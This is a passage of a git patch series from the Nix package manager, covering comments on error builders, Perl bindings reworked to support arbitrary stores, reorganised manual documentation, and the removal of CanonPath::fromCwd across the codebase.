This is the final method called on - // any such instancve and must delete itself before throwing the underlying + // any such instance and must delete itself before throwing the underlying // error. auto error = std::move(this->error); delete this; diff --git a/src/libexpr/eval-error.hh b/src/libexpr/eval-error.hh index ee69dce64..711743886 100644 --- a/src/libexpr/eval-error.hh +++ b/src/libexpr/eval-error.hh @@ -56,6 +56,11 @@ public: } }; +/** + * `EvalErrorBuilder`s may only be constructed by `EvalState`. The `debugThrow` + * method must be the final method in any such `EvalErrorBuilder` usage, and it + * handles deleting the object. + */ template class EvalErrorBuilder final { @@ -90,29 +95,10 @@ public: [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, std::string_view formatString, const Args &... formatArgs); + /** + * Delete the `EvalErrorBuilder` and throw the underlying exception. + */ [[gnu::noinline, gnu::noreturn]] void debugThrow(); }; -/** - * The size needed to allocate any `EvalErrorBuilder`. - * - * The list of classes here needs to be kept in sync with the list of `template - * class` declarations in `eval-error.cc`. - * - * This is used by `EvalState` to preallocate a buffer of sufficient size for - * any `EvalErrorBuilder` to avoid allocating while evaluating Nix code. 
- */ -constexpr size_t EVAL_ERROR_BUILDER_SIZE = std::max({ - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), - sizeof(EvalErrorBuilder), -}); - } From 9723f533d85133fa3c4d9421a58c7765cb61e733 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Tue, 6 Feb 2024 16:50:47 -0800 Subject: [PATCH 407/654] Add comment --- src/libexpr/eval.hh | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index afe89cd30..3c7c5da27 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -239,6 +239,7 @@ public: template [[nodiscard, gnu::noinline]] EvalErrorBuilder & error(const Args & ... args) { + // `EvalErrorBuilder::debugThrow` performs the corresponding `delete`. return *new EvalErrorBuilder(*this, args...); } From bc085022494fe90f733aef0832b6d7dcc34709cf Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 26 Jan 2024 15:54:33 -0500 Subject: [PATCH 408/654] Support arbitrary stores in Perl bindings Fix #9859 It's a breaking change but that's fine; we can just update Hydra to use the new bindings. 
--- perl/.yath.rc | 2 + perl/default.nix | 18 +++- perl/lib/Nix/Store.pm | 19 ++-- perl/lib/Nix/Store.xs | 201 +++++++++++++++++++++++++++--------------- perl/local.mk | 3 + perl/t/init.t | 13 +++ 6 files changed, 171 insertions(+), 85 deletions(-) create mode 100644 perl/.yath.rc create mode 100644 perl/t/init.t diff --git a/perl/.yath.rc b/perl/.yath.rc new file mode 100644 index 000000000..118bf80c8 --- /dev/null +++ b/perl/.yath.rc @@ -0,0 +1,2 @@ +[test] +-I=rel(lib/Nix) diff --git a/perl/default.nix b/perl/default.nix index 4687976a1..7103574c9 100644 --- a/perl/default.nix +++ b/perl/default.nix @@ -5,12 +5,12 @@ , nix, curl, bzip2, xz, boost, libsodium, darwin }: -perl.pkgs.toPerlModule (stdenv.mkDerivation { +perl.pkgs.toPerlModule (stdenv.mkDerivation (finalAttrs: { name = "nix-perl-${nix.version}"; src = fileset.toSource { root = ../.; - fileset = fileset.unions [ + fileset = fileset.unions ([ ../.version ../m4 ../mk @@ -20,7 +20,10 @@ perl.pkgs.toPerlModule (stdenv.mkDerivation { ./configure.ac ./lib ./local.mk - ]; + ] ++ lib.optionals finalAttrs.doCheck [ + ./.yath.rc + ./t + ]); }; nativeBuildInputs = @@ -40,6 +43,13 @@ perl.pkgs.toPerlModule (stdenv.mkDerivation { ++ lib.optional (stdenv.isLinux || stdenv.isDarwin) libsodium ++ lib.optional stdenv.isDarwin darwin.apple_sdk.frameworks.Security; + # `perlPackages.Test2Harness` is marked broken for Darwin + doCheck = !stdenv.isDarwin; + + nativeCheckInputs = [ + perlPackages.Test2Harness + ]; + configureFlags = [ "--with-dbi=${perlPackages.DBI}/${perl.libPrefix}" "--with-dbd-sqlite=${perlPackages.DBDSQLite}/${perl.libPrefix}" @@ -48,4 +58,4 @@ perl.pkgs.toPerlModule (stdenv.mkDerivation { enableParallelBuilding = true; postUnpack = "sourceRoot=$sourceRoot/perl"; -}) +})) diff --git a/perl/lib/Nix/Store.pm b/perl/lib/Nix/Store.pm index 3e4bbee0a..16f2e17c8 100644 --- a/perl/lib/Nix/Store.pm +++ b/perl/lib/Nix/Store.pm @@ -12,17 +12,20 @@ our %EXPORT_TAGS = ( 'all' => [ qw( ) ] ); our @EXPORT_OK = ( @{ 
$EXPORT_TAGS{'all'} } ); our @EXPORT = qw( - setVerbosity - isValidPath queryReferences queryPathInfo queryDeriver queryPathHash - queryPathFromHashPart - topoSortPaths computeFSClosure followLinksToStorePath exportPaths importPaths + StoreWrapper + StoreWrapper::new + StoreWrapper::isValidPath StoreWrapper::queryReferences StoreWrapper::queryPathInfo StoreWrapper::queryDeriver StoreWrapper::queryPathHash + StoreWrapper::queryPathFromHashPart + StoreWrapper::topoSortPaths StoreWrapper::computeFSClosure followLinksToStorePath StoreWrapper::exportPaths StoreWrapper::importPaths + StoreWrapper::addToStore StoreWrapper::makeFixedOutputPath + StoreWrapper::derivationFromPath + StoreWrapper::addTempRoot + StoreWrapper::queryRawRealisation + hashPath hashFile hashString convertHash signString checkSignature - addToStore makeFixedOutputPath - derivationFromPath - addTempRoot getBinDir getStoreDir - queryRawRealisation + setVerbosity ); our $VERSION = '0.15'; diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 423c01cf7..6730197b5 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -17,47 +17,61 @@ #include #include - using namespace nix; +static bool libStoreInitialized = false; -static ref store() -{ - static std::shared_ptr _store; - if (!_store) { - try { - initLibStore(); - _store = openStore(); - } catch (Error & e) { - croak("%s", e.what()); - } - } - return ref(_store); -} - +struct StoreWrapper { + ref store; +}; MODULE = Nix::Store PACKAGE = Nix::Store PROTOTYPES: ENABLE +TYPEMAP: < _store; try { - RETVAL = store()->isValidPath(store()->parseStorePath(path)); + if (!libStoreInitialized) { + initLibStore(); + libStoreInitialized = true; + } + if (items == 1) { + _store = openStore(); + RETVAL = new StoreWrapper { + .store = ref{_store} + }; + } else { + RETVAL = new StoreWrapper { + .store = openStore(s) + }; + } } catch (Error & e) { croak("%s", e.what()); } @@ -65,52 +79,81 @@ int isValidPath(char * path) RETVAL -SV * 
queryReferences(char * path) +void init() + CODE: + if (!libStoreInitialized) { + initLibStore(); + libStoreInitialized = true; + } + + +void setVerbosity(int level) + CODE: + verbosity = (Verbosity) level; + + +int +StoreWrapper::isValidPath(char * path) + CODE: + try { + RETVAL = THIS->store->isValidPath(THIS->store->parseStorePath(path)); + } catch (Error & e) { + croak("%s", e.what()); + } + OUTPUT: + RETVAL + + +SV * +StoreWrapper::queryReferences(char * path) PPCODE: try { - for (auto & i : store()->queryPathInfo(store()->parseStorePath(path))->references) - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(i).c_str(), 0))); + for (auto & i : THIS->store->queryPathInfo(THIS->store->parseStorePath(path))->references) + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(i).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * queryPathHash(char * path) +SV * +StoreWrapper::queryPathHash(char * path) PPCODE: try { - auto s = store()->queryPathInfo(store()->parseStorePath(path))->narHash.to_string(HashFormat::Nix32, true); + auto s = THIS->store->queryPathInfo(THIS->store->parseStorePath(path))->narHash.to_string(HashFormat::Nix32, true); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * queryDeriver(char * path) +SV * +StoreWrapper::queryDeriver(char * path) PPCODE: try { - auto info = store()->queryPathInfo(store()->parseStorePath(path)); + auto info = THIS->store->queryPathInfo(THIS->store->parseStorePath(path)); if (!info->deriver) XSRETURN_UNDEF; - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(*info->deriver).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(*info->deriver).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * queryPathInfo(char * path, int base32) +SV * +StoreWrapper::queryPathInfo(char * path, int base32) PPCODE: try { - auto info = store()->queryPathInfo(store()->parseStorePath(path)); + auto info = 
THIS->store->queryPathInfo(THIS->store->parseStorePath(path)); if (!info->deriver) XPUSHs(&PL_sv_undef); else - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(*info->deriver).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(*info->deriver).c_str(), 0))); auto s = info->narHash.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, true); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); mXPUSHi(info->registrationTime); mXPUSHi(info->narSize); AV * refs = newAV(); for (auto & i : info->references) - av_push(refs, newSVpv(store()->printStorePath(i).c_str(), 0)); + av_push(refs, newSVpv(THIS->store->printStorePath(i).c_str(), 0)); XPUSHs(sv_2mortal(newRV((SV *) refs))); AV * sigs = newAV(); for (auto & i : info->sigs) @@ -120,10 +163,11 @@ SV * queryPathInfo(char * path, int base32) croak("%s", e.what()); } -SV * queryRawRealisation(char * outputId) +SV * +StoreWrapper::queryRawRealisation(char * outputId) PPCODE: try { - auto realisation = store()->queryRealisation(DrvOutput::parse(outputId)); + auto realisation = THIS->store->queryRealisation(DrvOutput::parse(outputId)); if (realisation) XPUSHs(sv_2mortal(newSVpv(realisation->toJSON().dump().c_str(), 0))); else @@ -133,46 +177,50 @@ SV * queryRawRealisation(char * outputId) } -SV * queryPathFromHashPart(char * hashPart) +SV * +StoreWrapper::queryPathFromHashPart(char * hashPart) PPCODE: try { - auto path = store()->queryPathFromHashPart(hashPart); - XPUSHs(sv_2mortal(newSVpv(path ? store()->printStorePath(*path).c_str() : "", 0))); + auto path = THIS->store->queryPathFromHashPart(hashPart); + XPUSHs(sv_2mortal(newSVpv(path ? THIS->store->printStorePath(*path).c_str() : "", 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * computeFSClosure(int flipDirection, int includeOutputs, ...) +SV * +StoreWrapper::computeFSClosure(int flipDirection, int includeOutputs, ...) 
PPCODE: try { StorePathSet paths; for (int n = 2; n < items; ++n) - store()->computeFSClosure(store()->parseStorePath(SvPV_nolen(ST(n))), paths, flipDirection, includeOutputs); + THIS->store->computeFSClosure(THIS->store->parseStorePath(SvPV_nolen(ST(n))), paths, flipDirection, includeOutputs); for (auto & i : paths) - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(i).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(i).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * topoSortPaths(...) +SV * +StoreWrapper::topoSortPaths(...) PPCODE: try { StorePathSet paths; - for (int n = 0; n < items; ++n) paths.insert(store()->parseStorePath(SvPV_nolen(ST(n)))); - auto sorted = store()->topoSortPaths(paths); + for (int n = 0; n < items; ++n) paths.insert(THIS->store->parseStorePath(SvPV_nolen(ST(n)))); + auto sorted = THIS->store->topoSortPaths(paths); for (auto & i : sorted) - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(i).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(i).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * followLinksToStorePath(char * path) +SV * +StoreWrapper::followLinksToStorePath(char * path) CODE: try { - RETVAL = newSVpv(store()->printStorePath(store()->followLinksToStorePath(path)).c_str(), 0); + RETVAL = newSVpv(THIS->store->printStorePath(THIS->store->followLinksToStorePath(path)).c_str(), 0); } catch (Error & e) { croak("%s", e.what()); } @@ -180,29 +228,32 @@ SV * followLinksToStorePath(char * path) RETVAL -void exportPaths(int fd, ...) +void +StoreWrapper::exportPaths(int fd, ...) 
PPCODE: try { StorePathSet paths; - for (int n = 1; n < items; ++n) paths.insert(store()->parseStorePath(SvPV_nolen(ST(n)))); + for (int n = 1; n < items; ++n) paths.insert(THIS->store->parseStorePath(SvPV_nolen(ST(n)))); FdSink sink(fd); - store()->exportPaths(paths, sink); + THIS->store->exportPaths(paths, sink); } catch (Error & e) { croak("%s", e.what()); } -void importPaths(int fd, int dontCheckSigs) +void +StoreWrapper::importPaths(int fd, int dontCheckSigs) PPCODE: try { FdSource source(fd); - store()->importPaths(source, dontCheckSigs ? NoCheckSigs : CheckSigs); + THIS->store->importPaths(source, dontCheckSigs ? NoCheckSigs : CheckSigs); } catch (Error & e) { croak("%s", e.what()); } -SV * hashPath(char * algo, int base32, char * path) +SV * +hashPath(char * algo, int base32, char * path) PPCODE: try { PosixSourceAccessor accessor; @@ -280,64 +331,67 @@ int checkSignature(SV * publicKey_, SV * sig_, char * msg) RETVAL -SV * addToStore(char * srcPath, int recursive, char * algo) +SV * +StoreWrapper::addToStore(char * srcPath, int recursive, char * algo) PPCODE: try { auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; PosixSourceAccessor accessor; - auto path = store()->addToStore( + auto path = THIS->store->addToStore( std::string(baseNameOf(srcPath)), accessor, CanonPath::fromCwd(srcPath), method, parseHashAlgo(algo)); - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(path).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(path).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * makeFixedOutputPath(int recursive, char * algo, char * hash, char * name) +SV * +StoreWrapper::makeFixedOutputPath(int recursive, char * algo, char * hash, char * name) PPCODE: try { auto h = Hash::parseAny(hash, parseHashAlgo(algo)); auto method = recursive ? 
FileIngestionMethod::Recursive : FileIngestionMethod::Flat; - auto path = store()->makeFixedOutputPath(name, FixedOutputInfo { + auto path = THIS->store->makeFixedOutputPath(name, FixedOutputInfo { .method = method, .hash = h, .references = {}, }); - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(path).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(path).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * derivationFromPath(char * drvPath) +SV * +StoreWrapper::derivationFromPath(char * drvPath) PREINIT: HV *hash; CODE: try { - Derivation drv = store()->derivationFromPath(store()->parseStorePath(drvPath)); + Derivation drv = THIS->store->derivationFromPath(THIS->store->parseStorePath(drvPath)); hash = newHV(); HV * outputs = newHV(); - for (auto & i : drv.outputsAndOptPaths(*store())) { + for (auto & i : drv.outputsAndOptPaths(*THIS->store)) { hv_store( outputs, i.first.c_str(), i.first.size(), !i.second.second ? newSV(0) /* null value */ - : newSVpv(store()->printStorePath(*i.second.second).c_str(), 0), + : newSVpv(THIS->store->printStorePath(*i.second.second).c_str(), 0), 0); } hv_stores(hash, "outputs", newRV((SV *) outputs)); AV * inputDrvs = newAV(); for (auto & i : drv.inputDrvs.map) - av_push(inputDrvs, newSVpv(store()->printStorePath(i.first).c_str(), 0)); // !!! ignores i->second + av_push(inputDrvs, newSVpv(THIS->store->printStorePath(i.first).c_str(), 0)); // !!! 
ignores i->second hv_stores(hash, "inputDrvs", newRV((SV *) inputDrvs)); AV * inputSrcs = newAV(); for (auto & i : drv.inputSrcs) - av_push(inputSrcs, newSVpv(store()->printStorePath(i).c_str(), 0)); + av_push(inputSrcs, newSVpv(THIS->store->printStorePath(i).c_str(), 0)); hv_stores(hash, "inputSrcs", newRV((SV *) inputSrcs)); hv_stores(hash, "platform", newSVpv(drv.platform.c_str(), 0)); @@ -361,10 +415,11 @@ SV * derivationFromPath(char * drvPath) RETVAL -void addTempRoot(char * storePath) +void +StoreWrapper::addTempRoot(char * storePath) PPCODE: try { - store()->addTempRoot(store()->parseStorePath(storePath)); + THIS->store->addTempRoot(THIS->store->parseStorePath(storePath)); } catch (Error & e) { croak("%s", e.what()); } diff --git a/perl/local.mk b/perl/local.mk index 0eae651d8..ed4764eb9 100644 --- a/perl/local.mk +++ b/perl/local.mk @@ -41,3 +41,6 @@ Store_FORCE_INSTALL = 1 Store_INSTALL_DIR = $(perllibdir)/auto/Nix/Store clean-files += lib/Nix/Config.pm lib/Nix/Store.cc Makefile.config + +check: all + yath test diff --git a/perl/t/init.t b/perl/t/init.t new file mode 100644 index 000000000..80197e013 --- /dev/null +++ b/perl/t/init.t @@ -0,0 +1,13 @@ +use strict; +use warnings; +use Test2::V0; + +use Nix::Store; + +my $s = new Nix::Store("dummy://"); + +my $res = $s->isValidPath("/nix/store/g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar"); + +ok(!$res, "should not have path"); + +done_testing; From 140de3b2780c6c49030b118051e15f32d202bc49 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Thu, 8 Feb 2024 09:00:00 +0100 Subject: [PATCH 409/654] manual: fold sidebar sections the table of contents is very long now, and folded sections allow for a better overview. 
--- doc/manual/book.toml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/doc/manual/book.toml b/doc/manual/book.toml index 73fb7e75e..d524dbb13 100644 --- a/doc/manual/book.toml +++ b/doc/manual/book.toml @@ -6,6 +6,8 @@ additional-css = ["custom.css"] additional-js = ["redirects.js"] edit-url-template = "https://github.com/NixOS/nix/tree/master/doc/manual/{path}" git-repository-url = "https://github.com/NixOS/nix" +fold.enable = true +fold.level = 1 [preprocessor.anchors] renderers = ["html"] From e486b76eef135cdb1f112b9bb2ffcbf6a08f7c96 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Thu, 8 Feb 2024 09:08:58 +0100 Subject: [PATCH 410/654] move JSON section into Formats and Protocols --- doc/manual/src/SUMMARY.md.in | 8 ++++---- doc/manual/src/_redirects | 1 + doc/manual/src/{ => protocols}/json/derivation.md | 0 doc/manual/src/{ => protocols}/json/store-object-info.md | 5 +++-- src/nix/derivation-add.md | 2 +- src/nix/derivation-show.md | 2 +- 6 files changed, 10 insertions(+), 8 deletions(-) rename doc/manual/src/{ => protocols}/json/derivation.md (100%) rename doc/manual/src/{ => protocols}/json/store-object-info.md (96%) diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index 695d63dfc..167f54206 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ -104,10 +104,10 @@ - [Channels](command-ref/files/channels.md) - [Default Nix expression](command-ref/files/default-nix-expression.md) - [Architecture and Design](architecture/architecture.md) -- [JSON Formats](json/index.md) - - [Store Object Info](json/store-object-info.md) - - [Derivation](json/derivation.md) -- [Protocols](protocols/index.md) +- [Formats and Protocols](protocols/index.md) + - [JSON Formats](protocols/json/index.md) + - [Store Object Info](protocols/json/store-object-info.md) + - [Derivation](protocols/json/derivation.md) - [Serving Tarball Flakes](protocols/tarball-fetcher.md) - [Derivation "ATerm" file 
format](protocols/derivation-aterm.md) - [Glossary](glossary.md) diff --git a/doc/manual/src/_redirects b/doc/manual/src/_redirects index 62c693c97..8bf0e854b 100644 --- a/doc/manual/src/_redirects +++ b/doc/manual/src/_redirects @@ -36,5 +36,6 @@ /package-management/s3-substituter /store/types/s3-binary-cache-store 301! /protocols/protocols /protocols 301! +/json/* /protocols/json/:splat 301! /release-notes/release-notes /release-notes 301! diff --git a/doc/manual/src/json/derivation.md b/doc/manual/src/protocols/json/derivation.md similarity index 100% rename from doc/manual/src/json/derivation.md rename to doc/manual/src/protocols/json/derivation.md diff --git a/doc/manual/src/json/store-object-info.md b/doc/manual/src/protocols/json/store-object-info.md similarity index 96% rename from doc/manual/src/json/store-object-info.md rename to doc/manual/src/protocols/json/store-object-info.md index db43c2fa1..ba4ab098f 100644 --- a/doc/manual/src/json/store-object-info.md +++ b/doc/manual/src/protocols/json/store-object-info.md @@ -14,11 +14,11 @@ Info about a [store object]. * `narHash`: - Hash of the [file system object] part of the store object when serialized as a [Nix Archive](#gloss-nar). + Hash of the [file system object] part of the store object when serialized as a [Nix Archive]. * `narSize`: - Size of the [file system object] part of the store object when serialized as a [Nix Archive](#gloss-nar). + Size of the [file system object] part of the store object when serialized as a [Nix Archive]. * `references`: @@ -30,6 +30,7 @@ Info about a [store object]. [store path]: @docroot@/glossary.md#gloss-store-path [file system object]: @docroot@/store/file-system-object.md +[Nix Archive]: @docroot@/glossary.md#gloss-nar ## Impure fields diff --git a/src/nix/derivation-add.md b/src/nix/derivation-add.md index d9b8467df..331cbdd88 100644 --- a/src/nix/derivation-add.md +++ b/src/nix/derivation-add.md @@ -14,6 +14,6 @@ a Nix expression evaluates. 
`nix derivation add` takes a single derivation in the following format: -{{#include ../../json/derivation.md}} +{{#include ../../protocols/json/derivation.md}} )"" diff --git a/src/nix/derivation-show.md b/src/nix/derivation-show.md index 884f1adc6..2437ea08f 100644 --- a/src/nix/derivation-show.md +++ b/src/nix/derivation-show.md @@ -52,6 +52,6 @@ By default, this command only shows top-level derivations, but with [store path]: @docroot@/glossary.md#gloss-store-path -{{#include ../../json/derivation.md}} +{{#include ../../protocols/json/derivation.md}} )"" From d24c8aa49141fc384deafee50da65a05553a124b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Thu, 8 Feb 2024 09:22:30 +0100 Subject: [PATCH 411/654] Simplify a conditional in the repl initialisation --- src/libcmd/repl.cc | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 5b4d3f9d5..9826f0fac 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -255,9 +255,7 @@ void NixRepl::mainLoop() notice("Nix %1%%2%\nType :? for help.", nixVersion, debuggerNotice); } - if (isFirstRepl) { - isFirstRepl = false; - } + isFirstRepl = false; loadFiles(); From 0dea16e686e7128efd95a28e2000639bb169125a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Thu, 8 Feb 2024 09:50:12 +0100 Subject: [PATCH 412/654] Mention `OPTIMIZE=0` more prominently in the hacking guide This is a game-changer when developing, it shouldn't just be hidden amongst a list of more advanced variables. 
--- doc/manual/src/contributing/hacking.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9e2470859..d36d46620 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -44,13 +44,13 @@ To build Nix itself in this shell: ```console [nix-shell]$ autoreconfPhase [nix-shell]$ configurePhase -[nix-shell]$ make -j $NIX_BUILD_CORES +[nix-shell]$ make -j $NIX_BUILD_CORES OPTIMIZE=0 ``` To install it in `$(pwd)/outputs` and test it: ```console -[nix-shell]$ make install +[nix-shell]$ make install OPTIMIZE=0 [nix-shell]$ make installcheck check -j $NIX_BUILD_CORES [nix-shell]$ nix --version nix (Nix) 2.12 From 4687beecef87b358a514825e3700e47962ca2194 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 6 Feb 2024 16:23:58 -0500 Subject: [PATCH 413/654] Get rid of `CanonPath::fromCwd` As discussed in the last Nix team meeting (2024-02-95), this method doesn't belong because `CanonPath` is a virtual/ideal absolute path format, not used in file systems beyond the native OS format for which a "current working directory" is defined. 
Progress towards #9205 --- perl/lib/Nix/Store.xs | 8 ++-- src/libcmd/common-eval-args.cc | 6 +-- src/libcmd/common-eval-args.hh | 2 +- src/libcmd/editor-for.cc | 2 +- src/libcmd/installables.cc | 5 +- src/libcmd/repl.cc | 2 +- src/libexpr/eval.cc | 6 +-- src/libexpr/eval.hh | 5 ++ src/libexpr/paths.cc | 6 ++- src/libfetchers/fs-input-accessor.cc | 64 +++++--------------------- src/libfetchers/fs-input-accessor.hh | 5 +- src/libfetchers/git-utils.cc | 22 ++++----- src/libfetchers/git-utils.hh | 2 +- src/libfetchers/git.cc | 18 ++++---- src/libutil/archive.cc | 4 +- src/libutil/canon-path.cc | 5 -- src/libutil/canon-path.hh | 2 - src/libutil/posix-source-accessor.cc | 45 ++++++++++++++---- src/libutil/posix-source-accessor.hh | 29 +++++++++++- src/libutil/source-accessor.hh | 4 +- src/libutil/source-path.cc | 2 +- src/libutil/source-path.hh | 2 +- src/nix-build/nix-build.cc | 4 +- src/nix-env/nix-env.cc | 2 +- src/nix-instantiate/nix-instantiate.cc | 4 +- src/nix-store/nix-store.cc | 16 +++---- src/nix/add-to-store.cc | 4 +- src/nix/eval.cc | 2 +- src/nix/hash.cc | 4 +- src/nix/prefetch.cc | 5 +- 30 files changed, 152 insertions(+), 135 deletions(-) diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 6730197b5..4a928594b 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -256,9 +256,9 @@ SV * hashPath(char * algo, int base32, char * path) PPCODE: try { - PosixSourceAccessor accessor; + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path); Hash h = hashPath( - accessor, CanonPath::fromCwd(path), + accessor, canonPath, FileIngestionMethod::Recursive, parseHashAlgo(algo)).first; auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); @@ -336,10 +336,10 @@ StoreWrapper::addToStore(char * srcPath, int recursive, char * algo) PPCODE: try { auto method = recursive ? 
FileIngestionMethod::Recursive : FileIngestionMethod::Flat; - PosixSourceAccessor accessor; + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(srcPath); auto path = THIS->store->addToStore( std::string(baseNameOf(srcPath)), - accessor, CanonPath::fromCwd(srcPath), + accessor, canonPath, method, parseHashAlgo(algo)); XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(path).c_str(), 0))); } catch (Error & e) { diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc index 193972272..58f04e225 100644 --- a/src/libcmd/common-eval-args.cc +++ b/src/libcmd/common-eval-args.cc @@ -156,7 +156,7 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state) for (auto & i : autoArgs) { auto v = state.allocValue(); if (i.second[0] == 'E') - state.mkThunk_(*v, state.parseExprFromString(i.second.substr(1), state.rootPath(CanonPath::fromCwd()))); + state.mkThunk_(*v, state.parseExprFromString(i.second.substr(1), state.rootPath("."))); else v->mkString(((std::string_view) i.second).substr(1)); res.insert(state.symbols.create(i.first), v); @@ -164,7 +164,7 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state) return res.finish(); } -SourcePath lookupFileArg(EvalState & state, std::string_view s, CanonPath baseDir) +SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir) { if (EvalSettings::isPseudoUrl(s)) { auto storePath = fetchers::downloadTarball( @@ -185,7 +185,7 @@ SourcePath lookupFileArg(EvalState & state, std::string_view s, CanonPath baseDi } else - return state.rootPath(CanonPath(s, baseDir)); + return state.rootPath(baseDir ? 
absPath(s, *baseDir) : absPath(s)); } } diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh index 4b403d936..2eb63e15d 100644 --- a/src/libcmd/common-eval-args.hh +++ b/src/libcmd/common-eval-args.hh @@ -29,6 +29,6 @@ private: std::map autoArgs; }; -SourcePath lookupFileArg(EvalState & state, std::string_view s, CanonPath baseDir = CanonPath::fromCwd()); +SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir = nullptr); } diff --git a/src/libcmd/editor-for.cc b/src/libcmd/editor-for.cc index 67653d9c9..6bf36bd64 100644 --- a/src/libcmd/editor-for.cc +++ b/src/libcmd/editor-for.cc @@ -17,7 +17,7 @@ Strings editorFor(const SourcePath & file, uint32_t line) editor.find("vim") != std::string::npos || editor.find("kak") != std::string::npos)) args.push_back(fmt("+%d", line)); - args.push_back(path->abs()); + args.push_back(path->string()); return args; } diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc index 736c41a1e..16d25d3cf 100644 --- a/src/libcmd/installables.cc +++ b/src/libcmd/installables.cc @@ -487,10 +487,11 @@ Installables SourceExprCommand::parseInstallables( state->eval(e, *vFile); } else if (file) { - state->evalFile(lookupFileArg(*state, *file, CanonPath::fromCwd(getCommandBaseDir())), *vFile); + auto dir = absPath(getCommandBaseDir()); + state->evalFile(lookupFileArg(*state, *file, &dir), *vFile); } else { - CanonPath dir(CanonPath::fromCwd(getCommandBaseDir())); + Path dir = absPath(getCommandBaseDir()); auto e = state->parseExprFromString(*expr, state->rootPath(dir)); state->eval(e, *vFile); } diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 4b51fe393..137332895 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -899,7 +899,7 @@ void NixRepl::addVarToScope(const Symbol name, Value & v) Expr * NixRepl::parseString(std::string s) { - return state->parseExprFromString(std::move(s), state->rootPath(CanonPath::fromCwd()), staticEnv); + return 
